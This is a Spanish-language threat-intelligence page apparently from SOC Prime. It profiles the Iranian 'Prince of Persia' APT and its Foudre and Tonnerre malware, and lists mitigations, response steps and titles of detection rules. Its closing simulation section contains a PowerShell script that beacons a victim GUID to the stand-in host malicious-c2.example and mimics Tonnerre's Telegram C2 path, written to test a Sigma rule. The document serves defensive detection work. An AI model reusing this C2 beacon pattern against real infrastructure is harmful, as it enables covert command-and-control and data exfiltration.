SOC Prime Bias: Crítico

23 Dec 2025 10:56 UTC

Prince of Persia: una revisión de 10 años sobre la actividad del APT iraní

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Prince of Persia: una revisión de 10 años sobre la actividad del APT iraní
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El informe perfila al grupo APT vinculado al estado iraní denominado Príncipe de Persia y rastrea su progresión durante la última década, con énfasis en la actividad observada desde 2023 hasta 2025. Los operadores dependen de familias de malware personalizadas, incluyendo Foudre, Tonnerre, MaxPinner, Rugissement y Deep Freeze, para apoyar el espionaje y el robo sistemático de datos. Las iteraciones recientes introducen algoritmos de generación de dominios, comando y control basado en Telegram y cargas útiles SFX encriptadas para mejorar la resiliencia y el camuflaje. Los objetivos abarcan infraestructuras críticas y redes vinculadas a disidentes en múltiples regiones.

Investigación

Investigadores de SafeBreach siguieron las operaciones del grupo desde 2019, recopilando muestras frescas, documentando la arquitectura C2 y analizando la lógica del DGA. Desencriptaron cargas útiles protegidas, extrajeron credenciales de bot de Telegram y construyeron una línea de tiempo de despliegues de variantes. La investigación destaca infraestructuras separadas de producción y pruebas y detalla comportamientos de entrega de archivos vinculados a cadenas de infección impulsadas por Excel. Los indicadores de compromiso se reunieron de hashes de malware, dominios y URLs.

Mitigación

Monitorear la actividad DNS para los patrones DGA identificados, bloquear dominios maliciosos conocidos y restringir o inspeccionar el tráfico relacionado con bots de Telegram. Añadir detecciones para los nombres de archivos de malware referenciados y artefactos de DLL loaders, y usar monitoreo/sinkholing de DNS para detectar infraestructuras rotativas. Imponer lista blanca de aplicaciones y reforzar la seguridad de Office limitando los macros para reducir la probabilidad de acceso inicial.

Respuesta

Si se encuentra algún indicador, poner en cuarentena el sistema afectado, capturar evidencia volátil y ejecutar forense dirigido en archivos depositados y rutas de registro relevantes. Bloquear todos los dominios y direcciones IP vinculados, rotar los tokens de bot de Telegram expuestos y restablecer credenciales para cuentas afectadas. Buscar en todo el entorno los restos de DLL loaders personalizados y cargas SFX cifradas para asegurar la erradicación completa.

Flujo de Ataque

Detecciones

Posible Uso Abusivo de Telegram Como Canal de Comando y Control (vía dns_query)

Equipo SOC Prime
22 Dic 2025

Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios/ Herramientas de Terceros (vía proxy)

Equipo SOC Prime
22 Dic 2025

Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)

Equipo SOC Prime
22 Dic 2025

Ejecución Sospechosa de Taskkill (vía cmdline)

Equipo SOC Prime
22 Dic 2025

IOCs (HashSha256) para detectar: 18 DIC 2025 Príncipe de Persia: Una Década de Actividades de Campaña APT del Estado Nación Iraní Bajo el Microscopio Parte 2

Reglas de IA de SOC Prime
22 Dic 2025

IOCs (SourceIP) para detectar: 18 DIC 2025 Príncipe de Persia: Una Década de Actividades de Campaña APT del Estado Nación Iraní Bajo el Microscopio

Reglas de IA de SOC Prime
22 Dic 2025

IOCs (HashSha256) para detectar: 18 DIC 2025 Príncipe de Persia: Una Década de Actividades de Campaña APT del Estado Nación Iraní Bajo el Microscopio Parte 1

Reglas de IA de SOC Prime
22 Dic 2025

IOCs (HashMd5) para detectar: 18 DIC 2025 Príncipe de Persia: Una Década de Actividades de Campaña APT del Estado Nación Iraní Bajo el Microscopio

Reglas de IA de SOC Prime
22 Dic 2025

IOCs (DestinationIP) para detectar: 18 DIC 2025 Príncipe de Persia: Una Década de Actividades de Campaña APT del Estado Nación Iraní Bajo el Microscopio

Reglas de IA de SOC Prime
22 Dic 2025

Detección de Infección Foudre v34 a través de Archivo Excel con Ejecutable Embebido [Creación de Proceso de Windows]

Reglas de IA de SOC Prime
22 Dic 2025

Detección de Comunicación C2 de Foudre y Tonnerre [Conexión de Red de Windows]

Reglas de IA de SOC Prime
22 Dic 2025

Ejecución de Simulación

Prerequisito: La Verificación Previa de Telemetría y Línea Base debe haber pasado.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica adversaria (T1584.005) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y apuntar a generar exactamente la telemetría esperada por la lógica de detección.

  • Narrativa del Ataque y Comandos:
    El actor de la amenaza ha aprovisionado un dominio malicioso malicious-c2.example que aloja el servidor C2 de Foudre/Tonnerre. La carga útil del atacante en la máquina de la víctima realiza dos solicitudes HTTP GET:

    1. Envía el GUID de la víctima al endpoint C2 de Foudre usando el camino /1/?c=<GUID>.
    2. Contacta la API de Telegram a través del backdoor Tonnerre usando el camino /t/tga.adr.

    Ambas solicitudes se realizan sobre HTTP (para simplificar el registro de proxy) e incluyen un User-Agent genérico para mezclarse con el tráfico normal. Las acciones generan los campos exactos (request_method=GET, url conteniendo las subcadenas objetivo) que la regla Sigma busca.

  • Script de Prueba de Regresión:

    # ------------------------------------------------------------
    # Simulación de Comunicación C2 de Foudre & Tonnerre (Windows)
    # ------------------------------------------------------------
    
    # 1. Definir GUID de víctima (en una infección real, esto se leería del registro)
    $guid = (New-Guid).Guid
    
    # 2. Definir host C2 malicioso (reemplazar con una dirección que controles para pruebas)
    $c2Host = "http://malicious-c2.example"
    
    # 3. Enviar GUID al endpoint C2 de Foudre
    $foudreUrl = "$c2Host/1/?c=$guid"
    Write-Host "[*] Enviando GUID a Foudre C2: $foudreUrl"
    Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing
    
    # 4. Contactar la API de Telegram vía backdoor Tonnerre
    $telegramUrl = "$c2Host/t/tga.adr"
    Write-Host "[*] Contactando el endpoint de API de Telegram: $telegramUrl"
    Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing
    
    Write-Host "[+] Simulación completa. Verificar SIEM para alertas."

    El script es autónomo; ejecutarlo en un host Windows que enrute tráfico a través del proxy configurado producirá dos entradas de registro que coinciden con url|contains las condiciones de la regla Sigma.

  • Comandos de Limpieza:

    # Eliminar cualquier conexión de red temporal (solo relevante si el proxy crea sesiones persistentes)
    # Aquí simplemente limpiamos la caché DNS para evitar resolución persistente del host malicioso.
    ipconfig /flushdns
    Write-Host "[*] Limpieza completa."